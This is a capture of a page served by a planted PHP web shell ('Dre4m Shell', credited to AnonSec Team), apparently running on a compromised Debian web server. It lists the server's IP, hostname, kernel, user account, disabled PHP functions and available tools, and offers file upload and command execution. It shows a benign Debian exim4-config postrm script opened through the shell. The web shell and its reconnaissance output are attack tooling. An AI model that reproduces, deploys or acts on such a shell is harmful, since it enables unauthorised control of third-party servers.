Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.128.201.40
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/lib/dpkg/info/exim4-config.postrm
#!/bin/sh

set -e
if [ -n "$EX4DEBUG" ]; then
  echo "now debugging $0 $@"
  set -x
fi

case "$1" in
    purge)
    	dpkg-statoverride --remove /etc/exim4/passwd.client || true
	rm -f /etc/exim4/update-exim4.conf.conf
	rm -f /var/lib/exim4/config.autogenerated
	rm -f /etc/exim4/conf.d/main/03_exim4-config_neverusers \
		/etc/exim4/conf.d/rewrite/30_exim4-config_email-addresses \
		/etc/exim4/conf.d/rewrite/35_exim4-config_masquerade

	# remove empty directories in /etc/exim4
	rmdir /etc/exim4/conf.d/auth /etc/exim4/conf.d/acl \
		/etc/exim4/conf.d/transport /etc/exim4/conf.d/main \
		/etc/exim4/conf.d/retry /etc/exim4/conf.d/rewrite \
		/etc/exim4/conf.d/router /etc/exim4/conf.d \
		/etc/exim4 /var/lib/exim4 2> /dev/null || true
	rm -f /etc/default/exim4
	# remove user
	#deluser  --quiet Debian-exim > /dev/null || true
	;;
esac

# Automatically added by dh_installdebconf/13.11.4
if [ "$1" = purge ] && [ -e /usr/share/debconf/confmodule ]; then
	. /usr/share/debconf/confmodule
	db_purge
fi
# End automatically added section


Anon7 - 2022
AnonSec Team